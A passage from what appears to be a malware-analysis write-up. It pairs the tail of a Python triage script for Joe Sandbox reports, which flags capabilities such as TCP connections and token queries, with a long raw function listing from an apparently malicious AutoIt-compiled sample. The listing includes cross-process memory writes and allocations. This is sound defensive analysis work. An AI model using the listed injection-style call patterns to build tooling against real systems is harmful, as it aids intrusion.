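            j = names.index(n, i + 1)
            if ALLOCATORS & set(names[i + 1:j]):
                return n
    return None


def decode_dump(name):
    m = DUMP_RE.fullmatch(name)
    if not m:
        return None
    _pid, stage, _uid, base, protect, mtype = m.groups()
    return {"base": int(base, 16), "stage": int(stage),
            "protect": PAGE_PROTECT.get(int(protect, 16), protect),
            "type": MEM_TYPE.get(int(mtype, 16), mtype)}


def triage(text):
    return [{"refs": [c.ref for c in b.calls], "caps": capabilities(b),
             "size_probe": size_probe(b), "dump": decode_dump(b.dump),
             "decoded": {c.name: describe_call(c) for c in b.calls if describe_call(c)}}
            for b in parse_report(text)]


if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry)
```

Run over the whole function listing, the per-function output is what these blocks imply but do not state: which functions can open a TCP connection, which query the token, and that the code in the 0x931000 region was dumped from an image section mapped PAGE_EXECUTE_READWRITE. Since the head of the report says the binary is likely a compiled AutoIt script, most of these functions belong to the AutoIt runtime; the capability flags describe what the embedded interpreter can do, not necessarily what the script did.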
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EC94
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0096ECAB
                                      • MessageBeep.USER32(00000000), ref: 0096ECC3
                                      • KillTimer.USER32(?,0000040A), ref: 0096ECDF
                                      • EndDialog.USER32(?,00000001), ref: 0096ECF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: c2b4fcb79089b66121b2cebfc9264ace2ef4dde9b0f57b92071712e0270c817a
                                      • Instruction ID: eb4e3411f13dd5d266757b3d06f9ab2067492d21c1b29caa1e883f4f65c4303d
                                      • Opcode Fuzzy Hash: c2b4fcb79089b66121b2cebfc9264ace2ef4dde9b0f57b92071712e0270c817a
                                      • Instruction Fuzzy Hash: 54018134514705ABEB345B10DF9EB967BB8FF00B15F000669B582A14E0EBF8AA44DB80
                                      APIs
                                      • EndPath.GDI32(?), ref: 0094B0BA
                                      • StrokeAndFillPath.GDI32(?,?,009AE680,00000000,?,?,?), ref: 0094B0D6
                                      • SelectObject.GDI32(?,00000000), ref: 0094B0E9
                                      • DeleteObject.GDI32 ref: 0094B0FC
                                      • StrokePath.GDI32(?), ref: 0094B117
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: e3fc6db3d9b615172fa2415c11a5d8ae268bf367daf03e5939ab187f0d7db402
                                      • Instruction ID: d304a0ee0e2ec68ee723127f06ca535c416257de21d17cab7a745d4bf94c9e9f
                                      • Opcode Fuzzy Hash: e3fc6db3d9b615172fa2415c11a5d8ae268bf367daf03e5939ab187f0d7db402
                                      • Instruction Fuzzy Hash: E5F0193002D205EFCB25AF69ED0CB643B68AB14372F088314E425840F0D7318956EF94
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0097F2DA
                                      • CoCreateInstance.COMBASE(009BDA7C,00000000,00000001,009BD8EC,?), ref: 0097F2F2
                                      • CoUninitialize.COMBASE ref: 0097F555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize
                                      • String ID: .lnk
                                      • API String ID: 948891078-24824748
                                      • Opcode ID: b44f15fc05ed43b6fb308fea7c61307f61be0fbf004bb85165f24111a8ec7f18
                                      • Instruction ID: 110f5a52399c01373b842776439a3d9b613d533d073e04efbbbc816e6c415e80
                                      • Opcode Fuzzy Hash: b44f15fc05ed43b6fb308fea7c61307f61be0fbf004bb85165f24111a8ec7f18
                                      • Instruction Fuzzy Hash: 64A129B2104201AFD300EF64C891EABB7E8FFD8714F40495DF59597192EB70EA09CBA2
                                      APIs
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                      • CoInitialize.OLE32(00000000), ref: 0097E85D
                                      • CoCreateInstance.COMBASE(009BDA7C,00000000,00000001,009BD8EC,?), ref: 0097E876
                                      • CoUninitialize.COMBASE ref: 0097E893
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 2ff1e0fa8ab06be57e8fe4e6d68bdf5ce03ce08fed9e3640d74f4f3336cba9bc
                                      • Instruction ID: a4ad4b506fce2c3f9a27f143144e662bddcad66091a5fb7bdef60a323443c305
                                      • Opcode Fuzzy Hash: 2ff1e0fa8ab06be57e8fe4e6d68bdf5ce03ce08fed9e3640d74f4f3336cba9bc
                                      • Instruction Fuzzy Hash: F3A146766043019FCB14DF14C484E5ABBE9BF88724F148998F99A9B3A1CB31ED45CF91
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 009532ED
                                        • Part of subcall function 0095E0D0: __87except.LIBCMT ref: 0095E10B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: e3ea50bfa8adbf091da511777a6a29bb8091cc75a81c6c13b27ad96d876fbbbb
                                      • Instruction ID: 96ed372f2c09592adda4a1ff227f05ff9be8d23b86a7cad967835aaba63c935f
                                      • Opcode Fuzzy Hash: e3ea50bfa8adbf091da511777a6a29bb8091cc75a81c6c13b27ad96d876fbbbb
                                      • Instruction Fuzzy Hash: C3515C31A0C60196CB19E716C94137A2B9C9B80793F60CD68FCE5851E9DE3A8F8CA745
                                      APIs
                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,009CDC50,?,0000000F,0000000C,00000016,009CDC50,?), ref: 00974645
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009746C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper$__itow__swprintf
                                      • String ID: REMOVE$THIS
                                      • API String ID: 3797816924-776492005
                                      • Opcode ID: ad350b004e5e18dd306e06034040949c199fef3b680f77ad5f97691387da9113
                                      • Instruction ID: 66d552fb87d00d45ea820924544e8019e38a050e17e1bd082e783c9de74d97c6
                                      • Opcode Fuzzy Hash: ad350b004e5e18dd306e06034040949c199fef3b680f77ad5f97691387da9113
                                      • Instruction Fuzzy Hash: FA417176A002199FCF05DF64C881AADB7B5FF89304F14C469E91AAB2A2DB34DD45CF50
                                      APIs
                                        • Part of subcall function 0097430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0096BC08,?,?,00000034,00000800,?,00000034), ref: 00974335
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0096C1D3
                                        • Part of subcall function 009742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0096BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00974300
                                        • Part of subcall function 0097422F: GetWindowThreadProcessId.USER32(?,?), ref: 0097425A
                                        • Part of subcall function 0097422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0096BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0097426A
                                        • Part of subcall function 0097422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0096BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00974280
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0096C240
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0096C28D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 347be9cc4c668a10bcf4d1c12c8e13a28136488ed879417975de1190d9f4a643
                                      • Instruction ID: 09a335508da304c3a000d137ca8db5787f7f3af9b44ad9c7f0b692d817298f38
                                      • Opcode Fuzzy Hash: 347be9cc4c668a10bcf4d1c12c8e13a28136488ed879417975de1190d9f4a643
                                      • Instruction Fuzzy Hash: 71414B72900218AFDB10DFA4CD91BEEB7B8BF49700F008095FA99B7181DB71AE45CB61
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009CDC00,00000000,?,?,?,?), ref: 0099A6D8
                                      • GetWindowLongW.USER32 ref: 0099A6F5
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0099A705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: b3e310e9838b270fdcf781661c8328c431f2a93adc93ed3789867f5986864360
                                      • Instruction ID: 9f435ef490c0829784c43b07d50131a194850b59f15cd4a6fe0d4e9f9fc7ff2b
                                      • Opcode Fuzzy Hash: b3e310e9838b270fdcf781661c8328c431f2a93adc93ed3789867f5986864360
                                      • Instruction Fuzzy Hash: 4031AE3160520AAFDF118E78CC45BEA77A9EB49334F254729F975932E0D730A8509B91
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0099A15E
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0099A172
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0099A196
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: 37ff9ad26cce28695c2c03cbb97fdf4b5e315328de49b88502790ce92e26722f
                                      • Instruction ID: 0e464f61882ae6265211168f16dd916ebc5fe45c11ba371eee2127fc565577b8
                                      • Opcode Fuzzy Hash: 37ff9ad26cce28695c2c03cbb97fdf4b5e315328de49b88502790ce92e26722f
                                      • Instruction Fuzzy Hash: 0121A132514218ABDF258F98CC42FEA3B7AEF88724F110214FE55AB1D0D6B5AC51DB90
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0099A941
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0099A94F
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0099A956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 069b73aea0c7db508a3722a0606a2f7b16dd5acb6bd88ef05f6f9ad02c8fa457
                                      • Instruction ID: a764e608b493c79ae3fc3d06ab344d76aab07b04cbc3a2de82012c73ec32909e
                                      • Opcode Fuzzy Hash: 069b73aea0c7db508a3722a0606a2f7b16dd5acb6bd88ef05f6f9ad02c8fa457
                                      • Instruction Fuzzy Hash: F721A1B5600209AFDB10DF29CC91E7737ADEF9A3A8B050159FA049B261CB30EC11DBA1
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00999A30
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00999A40
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00999A65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 0b84ca1b9ea06f45606cfecc04ea649b84e4b675be0e69269954785133853632
                                      • Instruction ID: ad7c91a471d8bca830b3ec0dde3fdd8c163cefeea595ee10704539e3578bb74a
                                      • Opcode Fuzzy Hash: 0b84ca1b9ea06f45606cfecc04ea649b84e4b675be0e69269954785133853632
                                      • Instruction Fuzzy Hash: 4D21BE32611118BFDF268F5CCC85FBF3BAEEB89764F018128F9549B1A0C6719C5297A0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0099A46D
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0099A482
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0099A48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 9d0eee63712a2fc677221c2d30edeb102220d51206362200019566aa18841fea
                                      • Instruction ID: 3e09d96ed47618c120acb515d5c88941f46b7b9c96486e9414f8a2b38082dce5
                                      • Opcode Fuzzy Hash: 9d0eee63712a2fc677221c2d30edeb102220d51206362200019566aa18841fea
                                      • Instruction Fuzzy Hash: 27110A71210208BEEF245F69CC45FAB376DEFC8754F014118FA45960E1D2B2E811D760
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009522A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 009522A8
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 2574300362-340411864
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00952276), ref: 00952376
                                      • GetProcAddress.KERNEL32(00000000), ref: 0095237D
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 2574300362-2819208100
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0094E014,76230AE0,0094DEF1,009CDC38,?,?), ref: 0094E02C
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0094E03E
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009342EC,?,009342AA,?), ref: 00934304
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934316
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,009921FB,?,009923EF), ref: 00992213
                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00992225
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetProcessId$kernel32.dll
                                      • API String ID: 2574300362-399901964
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,009341BB,00934341,?,0093422F,?,009341BB,?,?,?,?,009339FE,?,00000001), ref: 00934359
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0093436B
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0097051D,?,009705FE), ref: 00970547
                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00970559
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1071820185
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0097052F,?,009706D7), ref: 00970572
                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00970584
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1587604923
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0098ECBE,?,0098EBBB), ref: 0098ECD6
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0098ECE8
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0098BAD3,00000001,0098B6EE,?,009CDC00), ref: 0098BAEB
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0098BAFD
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00993BD1,?,00993E06), ref: 00993BE9
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00993BFB
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0098AAB4
                                      • CoUninitialize.COMBASE ref: 0098AABF
                                        • Part of subcall function 00970213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0097027B
                                      • VariantInit.OLEAUT32(?), ref: 0098AACA
                                      • VariantClear.OLEAUT32(?), ref: 0098AD9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
